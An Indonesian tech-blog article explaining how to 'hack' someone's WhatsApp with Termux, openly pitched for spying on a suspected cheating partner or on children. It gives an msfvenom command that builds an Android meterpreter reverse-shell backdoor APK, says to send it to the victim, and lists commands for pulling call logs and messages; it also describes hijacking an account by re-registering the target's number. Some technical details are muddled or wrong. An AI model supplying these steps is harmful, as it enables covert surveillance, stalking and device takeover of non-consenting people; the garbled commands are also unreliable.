Cara Hack WhatsApp dengan Termux 2024

Cara Hack WhatsApp dengan Termux
tekno99.com - Cara Hack WhatsApp dengan Termux merupakan salah satu trik yang biasa digunakan oleh orang-orang agar bisa mengetahui aktivitas seseorang di aplikasi WhatsApp.

Menyadap akun WhatsApp dengan Termux ini bisa dilakukan oleh orang tua untuk mengawasi anak-anaknya dengan tujuan agar terhindar dari hal yang tidak baik saat ini.

Sebenarnya terdapat beberapa trik untuk hack WhatsApp orang lain, salah satunya yakni dengan menggunakan aplikasi Termux di HP Android.

Aplikasi Termux sendiri sudah cukup terkenal di kalangan hacker pemua maupun profesional sebagai bahan dasar untuk melakukan aktivitas hacking.

Selain itu, aplikasi Termux ini sudah terbukti bisa menyadap banyak hal seperti salah satunya yang akan kita bahas kali ini yaitu hack akun WhatsApp.

Langsung saja berikut cara hack WhatsApp dengan Termux di HP Android paling ampuh yang bisa anda coba di Smartphone Android.


Cara Hack WhatsApp dengan Termux

Cara Hack WhatsApp dengan Termux
Script Termux Sadap WA
Seperti dilansir dari situs insidetekno.com, cara hack WhatsApp ini bisa menjadi salah satu langkah mudah untuk membuktikan sebuah perselingkuhan, dimana jika pasangan anda memiliki tingkah laku yang mencurigakan.

Dengan begitu, anda bisa memastikannya dengan membuka isi chat pada sosial medianya tanpa ketahuan dengan trik hack WhatsApp Termux ini.

Jadi, anda tidak perlu bingung lagi untuk mencari tahu aktivitas seseorang di aplikasi WhatsApp karena anda hanya cukup memanfaatkan aplikasi Termux sehingga mengetahui seluruh aktivitas seseorang di WhatsApp.

Nah, untuk lebih jelasnya silahkan anda simak langkah-langkah cara hack WhatsApp dengan Termux tanpa menyentuh HP korban yaitu sebagai berikut:
  • Langkah pertama, pastikan jika perangkat anda memiliki Operation Sistem (OS) Lolipop 5.0 ke atas, 32 atau 64 bit ke atas.
  • Selanjutnya silahkan anda download aplikasi Termux melalui link yang telah kami sediakan berikut: (Download Aplikasi Termux)
  • Setelah itu lihat alamat IP anda sendiri dengan mengetik "ifconfig" pada aplikasi Termux.
  • Selanjutnya ketik script Termux hack WA ini "msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.166 LPORT=4444 R >hack.apk".
  • Pada kalimat "LHOST" silahkan anda ganti dengan alamat IP anda sendiri yang sudah dilihat pada langkah awal.
  • Kemudian buka menu "File > Home > hack.apk" untuk melihat file backdoor yang sudah tadi.
  • Setelah itu kirim file backdoor tersebut ke target anda baik melalui Messenger, WhatsApp dan lainnya.
  • Saat target berhasil menginstal file apk yang anda kirimkan maka tandanya anda sudah bisa melihat atau menyadap akun WhatsApp target.
Lalu bagaimana cara melihat hasil hack anda work atau tidak?langsung saja anda lihat di bawah ini yaitu sebagai berikut:
  • Untuk melihat riwayat panggilan target silahkan anda ketikan "dump_callog" di aplikasi Termux.
  • Untuk melihat riwayat pesan WhatsApp target ketikan "dump-sms" di aplikasi Termux.
Itulah cara menyadap akun WhatsApp dengan Termux tanpa meminjam tanpa menyentuh HP korban, selain itu anda juga bisa menyadap WhatsApp tanpa Termux.


Cara Hack WA Tanpa Termux

Cara Hack WhatsApp dengan Termux
Cara Hack WA Tanpa Termux
Berbicara mengenai aplikasi Android maka tidak terlepas dengan aplikasi sosial media karena memang sudah didukung dengan jaringan internet yang cepat dan stabil.

Oleh karena itulah beberapa orang timbul rasa curiga terhadap pasangannya akibat terlalu bebas berkomunikasi di media sosial seperti WhatsApp.

Jika demikian tentunya anda ingin mengetahui dengan siapa saja pasangan anda berkomunikasi, salah satu solusi yang bisa anda manfaatkan adalah trik cara hack WhatsApp dengan Termux.

Aplikasi Termux sendiri sudah cukup terkenal di kalangan para hacker pemula baik pemula maupun profesional.

Aplikasi ini sebagai bahan dasar untuk melakukan aktivitas hacking, tidak hanya itu aplikasi ini juga sudah terbukti bisa menyadap banyak hal salah satunya sadap WhatsApp.

Nah, jika Smartphone anda belum mumpuni untuk menginstal aplikasi Termux, anda tidak perlu khawatir karena masih bisa dilakukan tanpa adanya aplikasi tambahan seperti Termux.

Lalu bagaimana cara melakukan hack WA tanpa Termux?silahkan anda langsung saja ikuti panduan yaitu sebagai berikut:
  • Langkah pertama, pastikan terlebih dahulu aplikasi WhatsApp yang ada pada Smartphone anda adalah versi terbaru.
  • Untuk memulai menyadap cari tahu nomor HP dan alamat email target.
  • Kemudian masuk ke aplikasi WhatsApp dengan nomor Smartphone target.
  • Setelah itu lakukan sistem "Set Up".
  • Maka disini pihak aplikasi akan mengirim kode konfirmasi ke nomor yang di daftarkan.
  • Dengan begitu anda sudah bisa berhasil menyadap akun WhatsApp target.
  • Selesai.

Apakah Cara Hack WhatsApp dengan Termux Work?

Ada sebuah tool yang dapat anda coba untuk hack WhatsApp, aplikasi hack WhatsApp ini telah terbukti benar adanya bagi yang menggunakannya.

Tool hack WhatsApp bernama Termux ini sudah memang banyak hacker yang menggunakannya karena dengan Termux ini lebih mudah dalam menyadap WhatsApp.

Menggunakan trik cara hack WhatsApp dengan Termux ini bertujuan agar bisa melihat chatting di WhatsApp, mencari fakta apakah pasangan anda selingkuh atau tidak.

Jika terjadi error saat menjalankan script index.js anda bisa melakukannya secara manual dengan cara ketikan.

Jika berhasil maka chat WhatsApp korban akan terkoneksi dan akan menampilkan semua isi chat dan riwayat panggilan.

Akhir Kata

Itulah seluruh isi pembahasan yang dapat kami jabarkan kepada anda seputar cara hack WhatsApp dengan Termux pada artikel kali ini.

Dengan begitu, anda bisa melakukan hack WhatsApp dengan Termux ini sehingga anda bisa melihat seluruh pesan dan riwayat panggilan pada WhatsApp.

Perlu anda ketahui bahwa aplikasi Termux ini tidak hanya bisa digunakan untuk hack WhatsApp saja karena aplikasi lain seperti Facebook, Instagram dan lainnya juga bisa anda lakukan melalui Termux.

Dan khusus untuk hack Facecbook anda memerlukan script hack FB Termux mbf untuk bisa melakukan penyadapan dengan lancar.

Demikian informasi yang dapat kami bagikan kepada anda terkait cara hack aplikasi WhatsApp dengan Termux di atas. Semoga bermanfaat dan selamat mencoba.
Anantya Van B. Pakar teknologi yang berpengalaman selama bertahun-tahun di bidang teknologi seperti media sosial, games, gadget, komputer, aplikasi dan internet.

Tidak ada komentar:

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel